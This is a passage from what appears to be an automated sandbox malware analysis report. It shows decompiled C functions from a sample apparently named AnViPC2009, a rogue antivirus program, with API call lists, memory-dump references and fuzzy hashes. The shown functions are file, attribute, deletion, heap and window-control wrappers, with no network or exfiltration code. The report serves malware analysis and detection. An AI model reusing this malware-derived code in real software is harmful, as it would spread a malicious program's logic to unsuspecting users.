                                                                                                                                                  						 *(_t30 + 4) =  *(_t30 + 4) | 0xffffffff;
                                                                                                                                                  						if(_t24 == 0 &&  *((intOrPtr*)(_t30 + 0x14)) != _t24) {
                                                                                                                                                  							_t15 = _t30 + 0x17; // 0x17
                                                                                                                                                  							E00403296(0x414c7c, _t15);
                                                                                                                                                  						}
                                                                                                                                                  						goto L14;
                                                                                                                                                  					}
                                                                                                                                                  					_t22 = FindCloseChangeNotification(_t18); // executed
                                                                                                                                                  					asm("sbb bl, bl");
                                                                                                                                                  					_t24 =  ~(_t22 - 1) + 1;
                                                                                                                                                  					if(1 != 0 ||  *0x414c70 == 0) {
                                                                                                                                                  						_t23 = 0;
                                                                                                                                                  						while( *(0x414870 + _t23 * 4) != _t30) {
                                                                                                                                                  							_t23 = _t23 + 1;
                                                                                                                                                  							if(_t23 < 0x100) {
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							goto L11;
                                                                                                                                                  						}
                                                                                                                                                  						 *(0x414870 + _t23 * 4) =  *(0x414870 + _t23 * 4) & 0x00000000;
                                                                                                                                                  					}
                                                                                                                                                  					goto L11;
                                                                                                                                                  				}
                                                                                                                                                  				 *(__ecx + 0xc) =  *(__ecx + 0xc) & 0x00000000;
                                                                                                                                                  				goto L14;
                                                                                                                                                  			}








                                                                                                                                                  0x00404ef7
                                                                                                                                                  0x00404efd
                                                                                                                                                  0x00404eff
                                                                                                                                                  0x00404f07
                                                                                                                                                  0x00404f0d
                                                                                                                                                  0x00404f68
                                                                                                                                                  0x00404f68
                                                                                                                                                  0x00404f72
                                                                                                                                                  0x00404f72
                                                                                                                                                  0x00404f13
                                                                                                                                                  0x00404f4d
                                                                                                                                                  0x00404f4d
                                                                                                                                                  0x00404f53
                                                                                                                                                  0x00404f5a
                                                                                                                                                  0x00404f63
                                                                                                                                                  0x00404f63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404f53
                                                                                                                                                  0x00404f16
                                                                                                                                                  0x00404f21
                                                                                                                                                  0x00404f23
                                                                                                                                                  0x00404f25
                                                                                                                                                  0x00404f30
                                                                                                                                                  0x00404f32
                                                                                                                                                  0x00404f3b
                                                                                                                                                  0x00404f41
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404f43
                                                                                                                                                  0x00404f45
                                                                                                                                                  0x00404f45
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404f25
                                                                                                                                                  0x00404f01
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,00405470,?,?,?,00403273,?,00414C7C,0040335C,00000002,?,00404FE5,?), ref: 00404F16
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                                                  • String ID: |LA
                                                                                                                                                  • API String ID: 2591292051-4290591017
                                                                                                                                                  • Opcode ID: 22b8e8dd7a63493917274eee478992e32a9c10f4052c926a8568ea6d1c1fdc34
                                                                                                                                                  • Instruction ID: 75f987ff7a3b60ce8806b5479b3f433f77470b0d56a0be8814ff0b77dda38433
                                                                                                                                                  • Opcode Fuzzy Hash: 22b8e8dd7a63493917274eee478992e32a9c10f4052c926a8568ea6d1c1fdc34
                                                                                                                                                  • Instruction Fuzzy Hash: F601B5F00527029FE730AA34A4483A377D497D6326F01477FD2E2932D0D77898458B48
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040519F(void* __ecx, CHAR* _a4, WCHAR* _a8, struct _SECURITY_ATTRIBUTES* _a12) {
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				WCHAR* _t36;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  
                                                                                                                                                  				_t34 = __ecx;
                                                                                                                                                  				_t37 = __ecx;
                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                  					L2:
                                                                                                                                                  					_a12 = 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a12 = 0;
                                                                                                                                                  					if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                  						goto L2;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t22 = E00406E67();
                                                                                                                                                  				_t36 = _a8;
                                                                                                                                                  				if(_t22 == 0 || _t36 == 0 ||  *_t36 == 0) {
                                                                                                                                                  					_t23 = CreateFileA(_a4, 0xc0000000, _a12, 0, 2, 0, 0); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t23 = CreateFileW(_t36, 0xc0000000, _a12, 0, 2, 0, 0);
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t37 + 4) = _t23;
                                                                                                                                                  				 *((char*)(_t37 + 0x12)) = 1;
                                                                                                                                                  				 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                                                                                                                  				 *((char*)(_t37 + 0x10)) = 0;
                                                                                                                                                  				if(_t36 == 0) {
                                                                                                                                                  					 *((short*)(_t37 + 0x418)) = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					E0040E40C(_t37 + 0x418, _t36);
                                                                                                                                                  				}
                                                                                                                                                  				_t25 = _t37 + 0x17;
                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                  					E0040E1E9(_t34, _t36, _t25, 0x1000000);
                                                                                                                                                  				} else {
                                                                                                                                                  					E0040A450(_t25, _a4);
                                                                                                                                                  				}
                                                                                                                                                  				E00404ECE(_t37,  *(_t37 + 4));
                                                                                                                                                  				return 0 |  *(_t37 + 4) != 0xffffffff;
                                                                                                                                                  			}








                                                                                                                                                  0x0040519f
                                                                                                                                                  0x004051a7
                                                                                                                                                  0x004051ac
                                                                                                                                                  0x004051b6
                                                                                                                                                  0x004051b6
                                                                                                                                                  0x004051ae
                                                                                                                                                  0x004051ae
                                                                                                                                                  0x004051b4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004051b4
                                                                                                                                                  0x004051bd
                                                                                                                                                  0x004051c2
                                                                                                                                                  0x004051c7
                                                                                                                                                  0x004051f8
                                                                                                                                                  0x004051d2
                                                                                                                                                  0x004051e0
                                                                                                                                                  0x004051e0
                                                                                                                                                  0x004051fe
                                                                                                                                                  0x00405201
                                                                                                                                                  0x00405205
                                                                                                                                                  0x00405208
                                                                                                                                                  0x0040520d
                                                                                                                                                  0x00405220
                                                                                                                                                  0x0040520f
                                                                                                                                                  0x00405217
                                                                                                                                                  0x00405217
                                                                                                                                                  0x00405227
                                                                                                                                                  0x0040522d
                                                                                                                                                  0x00405241
                                                                                                                                                  0x0040522f
                                                                                                                                                  0x00405233
                                                                                                                                                  0x00405233
                                                                                                                                                  0x0040524b
                                                                                                                                                  0x0040525d

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404E7A,00000045,?,00000001,00000045), ref: 004051E0
                                                                                                                                                  • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404E7A,00000045,?,00000001,00000045), ref: 004051F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 0d6396ab3b67e2853f9f8080bc5c8414b68da011a796fbf291a3adc955f5eee7
                                                                                                                                                  • Instruction ID: deeb4ad8d62f16f56031398c2aa8362e229db7bd82372a129a01627aac88fa72
                                                                                                                                                  • Opcode Fuzzy Hash: 0d6396ab3b67e2853f9f8080bc5c8414b68da011a796fbf291a3adc955f5eee7
                                                                                                                                                  • Instruction Fuzzy Hash: F621A171400749BFEB209F618C85BAB7AACEF00748F04893FF551A6281C7789D549BA9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040572E(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                  				long _t6;
                                                                                                                                                  				WCHAR* _t8;
                                                                                                                                                  
                                                                                                                                                  				if(E00406E67() == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					_t6 = GetFileAttributesA(_a4); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t8 = _a8;
                                                                                                                                                  					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t6 = GetFileAttributesW(_t8);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return 0 | _t6 != 0xffffffff;
                                                                                                                                                  			}





                                                                                                                                                  0x00405735
                                                                                                                                                  0x0040574e
                                                                                                                                                  0x00405752
                                                                                                                                                  0x00405737
                                                                                                                                                  0x00405737
                                                                                                                                                  0x0040573d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405745
                                                                                                                                                  0x00405746
                                                                                                                                                  0x00405746
                                                                                                                                                  0x0040573d
                                                                                                                                                  0x00405762

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00404CD9,00000045,?,?,?,?), ref: 00405746
                                                                                                                                                  • GetFileAttributesA.KERNELBASE(?,00404CD9,00000045,?,?,?,?), ref: 00405752
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$Version
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3849939888-0
                                                                                                                                                  • Opcode ID: 111406815e8c2ee0db7041cba53e319ac68f9b3faee72a1c88eb85058d491332
                                                                                                                                                  • Instruction ID: eb631a914b25ddd8909624fbd9df007cea65af498cf4008e77b11e06c5ce248e
                                                                                                                                                  • Opcode Fuzzy Hash: 111406815e8c2ee0db7041cba53e319ac68f9b3faee72a1c88eb85058d491332
                                                                                                                                                  • Instruction Fuzzy Hash: 63D01234100A01D7CA155B30CD8855F76A8AF01360F158536B816E71F0D778C891FF1A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004057AA(void* __eflags, CHAR* _a4, WCHAR* _a8, long _a12) {
                                                                                                                                                  				signed int _t8;
                                                                                                                                                  				WCHAR* _t10;
                                                                                                                                                  
                                                                                                                                                  				if(E00406E67() == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					_t8 = SetFileAttributesA(_a4, _a12); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t10 = _a8;
                                                                                                                                                  					if(_t10 == 0 ||  *_t10 == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t8 = SetFileAttributesW(_t10, _a12);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t8 & 0xffffff00 | _t8 != 0x00000000;
                                                                                                                                                  			}





                                                                                                                                                  0x004057b1
                                                                                                                                                  0x004057ce
                                                                                                                                                  0x004057d6
                                                                                                                                                  0x004057b3
                                                                                                                                                  0x004057b3
                                                                                                                                                  0x004057b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004057c1
                                                                                                                                                  0x004057c6
                                                                                                                                                  0x004057c6
                                                                                                                                                  0x004057b9
                                                                                                                                                  0x004057e1

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000400,004058A0,00000000,00000400,00000000,?,00405976,00000400,00000002,00000001,00000000), ref: 004057C6
                                                                                                                                                  • SetFileAttributesA.KERNELBASE(00000000,00000400,004058A0,00000000,00000400,00000000,?,00405976,00000400,00000002,00000001,00000000), ref: 004057D6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$Version
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3849939888-0
                                                                                                                                                  • Opcode ID: 3935861823abb7121fd462879b350d5c08bffbeff4f1789f28dc769748e00011
                                                                                                                                                  • Instruction ID: 0b9cdd8040df12358fa06a3d6c311d73c462f82f8aafaaca66aaa64a5c2fd96d
                                                                                                                                                  • Opcode Fuzzy Hash: 3935861823abb7121fd462879b350d5c08bffbeff4f1789f28dc769748e00011
                                                                                                                                                  • Instruction Fuzzy Hash: EFE0B634204B01EADA165B21CA44A1B7BB9EB40740F04842AB949E21F0D778C860EA19
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405828(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                  				signed int _t6;
                                                                                                                                                  				WCHAR* _t8;
                                                                                                                                                  
                                                                                                                                                  				if(E00406E67() == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					_t6 = DeleteFileA(_a4); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t8 = _a8;
                                                                                                                                                  					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t6 = DeleteFileW(_t8);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t6 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                  			}





                                                                                                                                                  0x0040582f
                                                                                                                                                  0x00405848
                                                                                                                                                  0x0040584c
                                                                                                                                                  0x00405831
                                                                                                                                                  0x00405831
                                                                                                                                                  0x00405837
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040583f
                                                                                                                                                  0x00405840
                                                                                                                                                  0x00405840
                                                                                                                                                  0x00405837
                                                                                                                                                  0x00405857

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406E67: GetVersionExA.KERNEL32(?), ref: 00406E8B
                                                                                                                                                  • DeleteFileW.KERNEL32(?,00404FA1,-00000017,00000418,00000000,00405469,?,?,?,00403273,?,00414C7C,0040335C,00000002,?,00404FE5), ref: 00405840
                                                                                                                                                  • DeleteFileA.KERNELBASE(00000000,00404FA1,-00000017,00000418,00000000,00405469,?,?,?,00403273,?,00414C7C,0040335C,00000002,?,00404FE5), ref: 0040584C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteFile$Version
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3886669992-0
                                                                                                                                                  • Opcode ID: ce812f0baf4e3e4d30c85a143babd511dbf4f467b4817d52f4db514373571f8a
                                                                                                                                                  • Instruction ID: 4c1d8aa06d631447778ad2f0079c9dac918b9598f82bd8cb4cac1e65896924ae
                                                                                                                                                  • Opcode Fuzzy Hash: ce812f0baf4e3e4d30c85a143babd511dbf4f467b4817d52f4db514373571f8a
                                                                                                                                                  • Instruction Fuzzy Hash: 33D0172160460196DA113B21CA48A1B2AA8EB40340B08C03ABC01F11E0DB78CCB0EE29
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040A1DE(void* _a4) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				char _t5;
                                                                                                                                                  
                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                  					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                  					return _t5;
                                                                                                                                                  				}
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}





                                                                                                                                                  0x0040a1e5
                                                                                                                                                  0x0040a1f3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040a1f3
                                                                                                                                                  0x0040a1fa

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,0040DCAE,00000000,00000000,00402B67,?,00000000,00402C4D), ref: 0040A1EC
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,0040DCAE,00000000,00000000,00402B67,?,00000000,00402C4D), ref: 0040A1F3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                  • Opcode ID: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                  • Instruction ID: a82ff6b0785c3664831f762f5a4916162d8ebcb88197ec6847833ee3145ea3a6
                                                                                                                                                  • Opcode Fuzzy Hash: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                  • Instruction Fuzzy Hash: 56C01235000208ABC7101B90D90CBD53E599708302F008021B708840A0C6B441B0D69E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040A1C5(long _a4) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  
                                                                                                                                                  				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}




                                                                                                                                                  0x0040a1d4
                                                                                                                                                  0x0040a1db

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040A64C,?,?,00402B95), ref: 0040A1CD
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0040A64C,?,?,00402B95), ref: 0040A1D4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                  • Opcode ID: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                  • Instruction ID: 7a16409088186048d9048875d39c01f0395119e9692a071e2e70866dbb263e04
                                                                                                                                                  • Opcode Fuzzy Hash: 74236f5c7da168fb3ace1d47c58c672c3213b8dd958d6a0e7c8abee1cd3c7f39
                                                                                                                                                  • Instruction Fuzzy Hash: 35C04C76044208A7C6105BD1AD09B857E1EE718651F008121F70585050C6B15120D66E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040303B(struct HWND__* _a4, int _a8, signed char _a12) {
                                                                                                                                                  				int _t6;
                                                                                                                                                  
                                                                                                                                                  				_t6 = EnableWindow(GetDlgItem(_a4, _a8), _a12 & 0x000000ff); // executed
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}




                                                                                                                                                  0x00403050
                                                                                                                                                  0x00403056

                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32 ref: 00403049
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00403050
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallbackDispatcherItemUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4250310104-0
                                                                                                                                                  • Opcode ID: bbf78243f25ff81acabeaf5dad315e862b771a1aca33ad464662f4ccfa4a290c
                                                                                                                                                  • Instruction ID: dc0878946e7b984a377acabc94d3e267ee30d019ea7c960415ec6777497c3dfc
                                                                                                                                                  • Opcode Fuzzy Hash: bbf78243f25ff81acabeaf5dad315e862b771a1aca33ad464662f4ccfa4a290c
                                                                                                                                                  • Instruction Fuzzy Hash: CBC04C7740C240BFCB015BA09E08D6FBFA9EB94311F00C959B5E5C0030C6758520DB16
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040A1FD(void* _a4, long _a8) {
                                                                                                                                                  				void* _t7;
                                                                                                                                                  
                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                  					return HeapReAlloc(GetProcessHeap(), 0, _a4, _a8);
                                                                                                                                                  				}
                                                                                                                                                  				_t7 = E0040A1C5(_a8); // executed
                                                                                                                                                  				return _t7;
                                                                                                                                                  			}




                                                                                                                                                  0x0040a204
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040a21f
                                                                                                                                                  0x0040a209
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000007,?,0040DC87,?,?,00000000,?,00408D63,00000000,00000000,?,?,?,00401DA9), ref: 0040A218
                                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,?,0040DC87,?,?,00000000,?,00408D63,00000000,00000000,?,?,?,00401DA9,00000007), ref: 0040A21F
                                                                                                                                                    • Part of subcall function 0040A1C5: GetProcessHeap.KERNEL32(00000000,?,?,0040A64C,?,?,00402B95), ref: 0040A1CD
                                                                                                                                                    • Part of subcall function 0040A1C5: RtlAllocateHeap.NTDLL(00000000,?,0040A64C,?,?,00402B95), ref: 0040A1D4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocAllocate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1154092256-0
